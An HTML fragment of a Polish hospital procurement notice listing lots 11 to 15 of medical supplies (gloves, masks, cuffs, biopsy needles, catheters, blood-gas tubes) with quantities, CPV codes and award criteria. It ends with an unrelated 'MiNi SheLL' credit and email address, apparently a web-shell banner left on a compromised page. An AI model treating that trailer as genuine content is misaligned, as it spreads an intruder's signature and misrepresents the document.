<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Rękawice bezpudrowe diagnostyczne, lateksowe typu DERMAGRIP High Risk lub równoważne, niesterylne, jednorazowego użytku o wysokich właściwościach ochronnych w przypadku kontaktu z substancjami niebezpiecznymi pochodzenia biologicznego oraz chemicznego. Powierzchnia dłoniowa teksturowana, rękawica wykończona rolowanym mankietem. Grubość : palec ok 15 mm od wierzchołka 0,80 mm, dłoń: na środku powierzchni dłoni - 0,60 mm. Rękawice umożliwiające wykonanie precyzyjnych ruchów, dobrze przylegające. Zgodność z Dyrektywą dotyczącą sprzętu ochrony osobistej 93/42/EEC. Zgodność z normą EN 455-1,2,3, EN388, EN420.                      1 opakowanie - 50 szt		
a	  - rozmiar S 	op.	50
b	  - rozmiar M 	op.	150
2	Okulary ochronne ( dla pracowników centralnej sterylizacji ), dla dorosłych, wykonane z przeźroczystego polikarbonu (PC) 100 %, z filtrem zabezpieczającym przed promieniami UV, bez regulacji zauszników, pakowane indywidualnie, posiadające boczne otwory wentylacyjne w zausznikach, krawędzie okularów zaokrąglone.	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.73.51.00-2, 18.42.43.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet nr 11 - maski chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maska chirurgiczna, respiratorowa, dla ochrony personelu i pacjentów przed drobnoustrojami, aerozolami/leki cytostatyczne, środki dezynfekcyjne/zgodna z wymogami EN 14683, typ II R, odporność na rozprysk min 160 mm Hg, filtracja cząsteczkowa 0,1 mikrona na poziomie min 99% ( STM F2299), opór przepływu poniżej 5 cm H2O. Należy dołączyć wyniki badań., szt	1 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.19.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet nr 12 - jednorazowe mankiety do mierzenia ciśnienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Jednorazowy mankiet do mierzenia ciśnienia, jednodrozny, wykonany z winylu, kolor biały , bez lateksu. Znak CE		
- rozmiar  ( 26 - 33 )	szt	20
- rozmiar  ( 33 - 41 )	szt	20
2.Jednorazowy mankiet do mierzenia ciśnienia, jednodrozny, wykonany z delikatnego tworzywa, pokrytego włókniną, kolor biały, bez zawartości lateksu		
-rozmiar  ( 26 - 33 )	szt	45
-rozmiar  ( 33 - 41 )	szt	15
-rozmiar  ( 16 - 28 )	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet nr 13 - igły do biopsji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Igła do biopsji aspiracyjnej: wewnętrzny mandryn ze skośnym szlifem, plastikowa przeźroczysta nasadka igły umożliwiające precyzyjne wprowadzanie, rozmar 0,7 mm x 64 mm. Sterylna, pakowana w plastikową wytłoczką zapobiegająca przebiciu, rozmiar igły kodowany kolorem.,	szt.	200
2.Igła do biopsji aspirsacyjnej: wewnętrzny mandryn ze skośnym szlifem, plastikowa przeźroczysta nasadka igły umożliwiające precyzyjne wprowadzanie, rozmar 0,7 mm x 88 mm. Sterylna, pakowana w plastikową wytłoczką zapobiegająca przebiciu, rozmiar igły kodowany kolorem.,	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.23-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet nr 14 - sprzęt do badań hemodynamicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Cewniki balonowe:	szt	20
- balony wykonane z nylonu, pokryte śliską substancją,		
niskoprofilowe: niski profil pierwotny i powtórny ( dla balonu śr. 12 mm możliwe użycie koszulki 7 F ),		
- korpusy od 3 F do 5 F o podwójnym świetle, odporne na zginanie pękanie,		
- koncówka dwuczęściowa - atrumatyczna,		
- zakres długości balonu - 10 : 120 mm		
- zakres średnic balonu - 1,5: 25 mm,		
- długość cewnika : 40, 65, 80, 110, 135 mm,		
- możliwość wyboru pomędzy typem balonu OTW i monorail ( dla typu monorail: zakres średnic 4 : 7 mm, różnica kolejnych średnic co 0,5 mm, zakres dł. 15 : 40 mm)		
- profil proksymalny i dystalny prowadnika 3,3 F		
2.Cewniki diagnostyczne:	szt	100
- średnica 4 F - 7 F,		
- materiał: nylon zbrojony na całej długości,		
- końcówka miękka, atrumatyczna,		
- pokryte na zewnątrz substancją hydrofilną,		
- koćówka cewnika widoczna w obrazie RTG,		
- cewniki akceptują maksymalną średnicę prowadników - 5F - 0,048 , 4F - 0,42		
3.Prowadniki diagnostyczne:	szt	200
- prowadniki diagnostyczne poryte teflonem,		
- zakres średnic 0,018 - 0,038,		
- typy końcówek: proste ( promień zagięcia 1,5 - 15 mm )		
- długośc 125 - 260 cm		
4.Igły do angiografii:	szt	250
- jednoczęściowe ze skrzydełkami,		
 - średnica wewnętrzna 0,035 - 0,038		
5.Koszulki naczyniowe:	szt	250
- poliuretanowa kaniula koszulką hemostatyczną i portem bocznym, pokryta śliską substancją,		
- zakres średnic 4 - 11 F		
- zakres długości: 5,5 - 90 cm.		
- w zestawie odpowiedni prowadnik do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15 - probówki i nakładki do pobierania krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Probówki do pobierania krwi na gazometrię krwi tętniczej z dołączonym filtrem odpowietrzającym zapeniającym utrzymanie prawidłowych warunków transportu i oznaczenia.,	szt.	2 500
2.Nakładki na probówki typu Haemo-diff dostosowane kompatybilnie z probówkami stosowanymi w IGiChP do badań morfologicznych umożliwiające bez otwierania korka aplikację kropli krwi na szkiełko i wykonanie rozmazu, szt. 1 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com